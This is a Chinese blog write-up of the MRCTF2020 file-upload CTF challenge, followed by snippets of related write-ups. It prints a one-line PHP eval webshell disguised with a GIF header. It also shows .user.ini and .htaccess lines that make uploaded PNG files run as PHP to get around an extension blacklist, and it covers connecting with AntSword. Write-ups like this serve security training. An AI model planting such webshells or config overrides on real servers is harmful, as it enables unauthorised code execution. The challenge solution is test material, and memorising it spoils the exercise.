[MRCTF2020]你传你呢 1--详细解析

最新推荐文章于 2025-04-29 17:45:38 发布
最新推荐文章于 2025-04-29 17:45:38 发布
阅读量2.2k 收藏 12
点赞数 51
CC 4.0 BY-SA版权
分类专栏: 刷题记录 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56019217/article/details/143782496

信息收集

进入靶机,是一个文件上传界面。
在这里插入图片描述
根据题目和界面内容,可以知道考察的是文件上传漏洞。

思路

文件上传的题目,先看看有没有前端校验
查看一下源代码:
在这里插入图片描述没有前端校验。

那我们正常上传一个一句话木马文件试一下:

//shell.php
GIF89a
<?php @eval($_POST[1]);?>

跳转到了upload.php文件下,根据回显得出我们上传失败了。
在这里插入图片描述
那有可能是存在MIME验证,我们把shell.php后缀名修改为png,上传并抓包修改回php,就能绕过MIME验证了。
依旧上传失败。

说明后端可能对文件后缀名或者文件内容进行了过滤
先验证有没有过滤文件内容:
直接上传shell.png文件,如果成功上传就是没有过滤文件内容。
在这里插入图片描述

/var/www/html/upload/0b30fe0d446faf347661fadc83c7bb26/shell.png succesfully uploaded!

上传成功。说明没有过滤文件内容,而是后端对后缀名进行了黑名单过滤

现在我们就知道了网站存在的过滤方式。要想执行恶意代码,有两种方法:
第一种,利用后缀名解析漏洞,上传后缀名不为php,但是会被解析为php的文件。
第二种,上传.user.ini配置文件,将我们上传的png文件的内容解析为php代码。

先尝试第一种:
fuzz测试发现基本上后缀名都被过滤了,该方法行不通。
在这里插入图片描述

那么用第二种方法试一下:

//.user.ini
GIF89a
auto_prepend_file=shell.png

上传文件,记得抓包修改一下MIME类型。成功上传:
在这里插入图片描述

Warning: mkdir(): File exists in /var/www/html/upload.php on line 23
/var/www/html/upload/0b30fe0d446faf347661fadc83c7bb26/.user.ini succesfully uploaded!

但是我们上传的文件都被保存在0b30fe0d446faf347661fadc83c7bb26目录下,但是我们不能访问这个目录,而且也不知道目录下有没有php文件存在,.user.ini文件失效。

这里我们学习一个新知识点:.htaccess配置文件
首先,这个文件只适用于Apache服务器,而这道题的环境就是Apache。

当.htaccess文件被放置在一个 "通过Apache Web服务器加载 "的目录中时,.htaccess文件会被Apache
Web服务器软件检测并执行。这些.htaccess文件可以用来改变Apache Web服务器软件的配置,以启用/禁用Apache
Web服务器软件所提供的额外功能和特性。

我们需要的.htaccess文件内容是这样的:

AddType application/x-httpd-php .png

意思是将同目录下的所有png文件当作php执行。

上传.htaccess文件(记得修改MIME类型):
在这里插入图片描述
上传成功:

Warning: mkdir(): File exists in /var/www/html/upload.php on line 23
/var/www/html/upload/0b30fe0d446faf347661fadc83c7bb26/.htaccess succesfully uploaded!

访问我们之前上传的木马文件:
在这里插入图片描述成功解析。

想手动POST传参进行RCE,发现执行不了。查看一下phpinfo():
在这里插入图片描述发现禁用了许多函数,其中当然就包括了许多我们RCE常用的系统命令函数。
所以拿蚁剑连接一下,在根目录找到了flag:
在这里插入图片描述终于得到flag。

总结

学到了新的配置文件:.htaccess文件,在之后面对Apache环境的文件上传漏洞时又多了一种应对手段。

[MRCTF2020]你你呢
汗的博客
09-06 907
准备一张图片马,命名shell.png .htaccess文件 <FilesMatch "s"> SetHandler application/x-httpd-php </FilesMatch> 需要用burp修改Content-Type: image/jpeg
【buusql】[MRCTF2020]你你呢 1
katniss688的博客
06-28 777
而后门的具体位置虽然就在/var/www/html/upload/d3cf55c760ac2bb268b0c6e6072c610a/ccrequest.png这个文件里,但我们还需要定位到我们的网页index.php储存在html这个文件夹里,所以说,后门的url就是网页url/upload/xxxxxxxxxxxxxx/xx.png。copy:将文件复制或者是合并,/b的意思是以前边图片二进制格式为主,进行合并,合并后的文件依旧是二进制文件,实用于图像/声音等二进制文件。首先,准备一个一句话木马。
BUUCTF之[MRCTF2020]你你呢1
weixin_66294723的博客
10-12 1963
很明显是文件上漏洞,通过🐎可知应该是要一个马进去,一开始把自己制作的图片马进去后自己的图片马不行,content-type也没问题后上网找wp发现如果一系列%00,改大小写,图片马之类都不行的话 ,或者上之后 但是菜刀连接不了,回显显示没有数据的话,就代表要改配置文件。
BUUCTF[MRCTF2020]你你[特殊字符]呢1
最新发布
shsisbdkka的博客
04-29 303
如果出现服务器500报错的话可能是你的.htaccess文件中用的木马文件名和你的不一样,也可能是两个包上去的顺序反了。但发现不管后缀名怎么改(phtml,php1,php2....)都不行。(不要加GIF89a文件头)其中的aa.jpg是你要上的木马。发现上不成功,可能是后缀名,木马内容被过滤,一个一个试。先抓包上一个文件名为.htaccess的文件,内容为。成功访问后在目录里面找一下,发现有个flag的文件。****.htaccess的用法。发现是可以的,那大概率就是。***再上你的木马。
[MRCTF2020]你你呢 1
qq_43618536的博客
07-03 1355
BUUCTF的[MRCTF2020]你你🐎呢 1
[MRCTF2020]你你[特殊字符]呢1
ywx05_的博客
01-20 280
试了一下发现能用.htaccess解析漏洞,我们先创建一个文件,文件名为.htaccess,内容为。代码的意思就是,将当前目录下文件名为abc的文件当成php来解析。然后复制一下回显的地址,并将之前的连接拼起来,得到后面的url。上成功了,确认是黑名单过滤文件后缀跟MIME,还回显了路径。然后上蚁剑,右键添加数据,找到flag。上该文件,抓包修改一下MIME信息。接下来重新上一个1.png文件。小白一个,记录直接的刷题过程。发现是不行的,被过滤掉了。修改后缀,重新上看看。
【BUUCTF之[MRCTF2020]你你呢 1
qq_40646572的博客
10-25 6146
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
BUUCTF-Web-[MRCTF2020]你你马呢
m0_61851859的博客
04-03 997
3.考虑是不是对php进行过滤,尝试黑名单绕过,将文件后缀修改为.phtml等一些后缀名发现上失败。4.将文件类型修改为.jpg类型尝试上并启用burpsuite抓包发现是可以成功上的。一个.htaccess文件去把.jpg解析成.php。把content-type改成image/jpeg。1.打开题目发现文件上位置,猜测为文件上漏洞。7.拼接url使用蚁剑连接,成功找到flag。2.尝试上一句话木马,上失败。
BUUCTF之[MRCTF2020]套娃 --- 文件包含漏洞
weixin_44632787的博客
06-27 851
BUUCTF之[MRCTF2020]套娃 题目 发现什么都没有,于是鼠标右键查看一下提示。 可以看到PHP代码 <?php //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' &
CTF——MISC习题讲解(MRCTF2020系列)
tlovejr的博客
03-08 4435
CTF——MISC习题讲解(MRCTF2020系列) 前言 上一章节我们已经做完一场比赛的杂项题目,这次给大家介绍一下MRCTF中杂项题目 一、[MRCTF2020]pyFlag 题目链接如下: 链接:https://pan.baidu.com/s/1IQWks6UXUFq5gbkpcGp9sw?pwd=t05h 提取码:t05h 首先打开题目后发现共有三张图片 老规矩,对于杂项的题目先扔到winhex或者010Editor工具进行查看 但是发现这几张图片的结尾处都是存在压缩包数据 第一张图片 第二张图
[BUUCTF]-PWN:mrctf2020_easy_equation解析
2301_79326813的博客
02-03 520
查看保护再看ida很明了,题目就是让我们用格式化字符串漏洞修改judge的值(可以用python脚本进行计算,最终算出来得2)使等式成立,然后getshell。虽然操作比较简单,但我还是列出了几种方法。
web:[MRCTF2020]你你呢
sleepywin的博客
10-10 779
这里参考了大佬的wp,上一个.htaccess文件,这个.htaccess文件的作用就是把这个图片文件解析成php代码执行。上文件,先随便上一个文件看看情况。.htaccess文件的内容为。回显一片空白,说明木马上成功。构造含有一句话木马的图片上。这里用bp抓包修改类型。在根目录找到flag。
[MRCTF2020]你你呢1
qq_73861475的博客
09-13 474
一开始做以为是简单的文件上,写一个一句话木马,以图片的形式上,再用bp抓包,改后缀,回显之后用蚁剑连接,连接完成后再打开文件夹寻找flag,但是蚁剑连接的时候会直接报错,看了别人的wp后才知道文件上存在文件解析的漏洞更改Apache里的.htaccess的配置,可以将其它类型的文件转化为PHP的文件类型。首先写一句话木马,以1.png的形式保存再写一个.htaccess文件注意1.png是上面一句话木马的文件名文件写好后,先上.htaccess文件bp抓包更改文件类型文件上成功。
BUUCTF——[MRCTF2020]你你呢 1
weixin_45864041的博客
09-28 1404
php文件格式的一句话木马。 上失败。那就先jpg文件 发现上成功。然后我们可以先把路径保存下来。 接下来我们再试一下可不可以通过抓包修改的方式上php文件。 发现上失败。然后,我们又得变换思路了。上一篇文章,我们知道目录下有一个index.php文件,然后我们通过上.user.ini文件让图片被当做php文件解析。接下来我想到一个思路,那就是.htaccess文件。.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上的jpg/.
2024.11.19——[MRCTF2020]你你呢
2402_87387800的博客
11-28 222
php?上木马抓包将其发送到Repeater重复器然后放行,发现上失败,被过滤掉了。
[MRCTF2020]vigenere 1
02-21
### MRCTF2020 Vigenère 1 解题思路 对于MRCTF2020中的Vigenère 1题目,加密方法采用了维吉尼亚密码。通过在线工具解密给定的文本内容,能够揭示出最终的标志(flag),其形式为`mrctf{vigenere_crypto_crack_man}`[^2]。 为了成功破解此题,参与者通常会经历以下几个方面的思考: - **识别加密算法**:确认所使用的具体加密技术是维吉尼亚密码。 - **利用已知信息**:借助提供的线索或模式来推测可能的关键字长度以及部分明文字符。 - **应用适当工具**:运用专门设计用于分析和破解此类古典密码系统的软件资源辅助求解过程。 下面是一个简单的Python代码片段展示如何实现基本的维吉尼亚密码解码逻辑(假设已经知道了密钥): ```python def decrypt_vigenere(ciphertext, key): plaintext = "" key_index = 0 for char in ciphertext: shift = ord(key[key_index % len(key)]) - ord('a') decrypted_char = chr((ord(char.lower()) - ord('a') - shift) % 26 + ord('a')) plaintext += decrypted_char.upper() if char.isalpha(): key_index += 1 return plaintext ciphertext = "CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZOHIXOEOWMEHZO" key = "crypto" print(decrypt_vigenere(ciphertext, key)) ``` 这段程序定义了一个名为`decrypt_vigenere()` 的函数,它接收两个参数——被加密的消息(`ciphertext`) 和用来解密它的密钥 (`key`). 函数内部实现了基于字母表循环位移原理的标准维吉尼亚解密流程.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值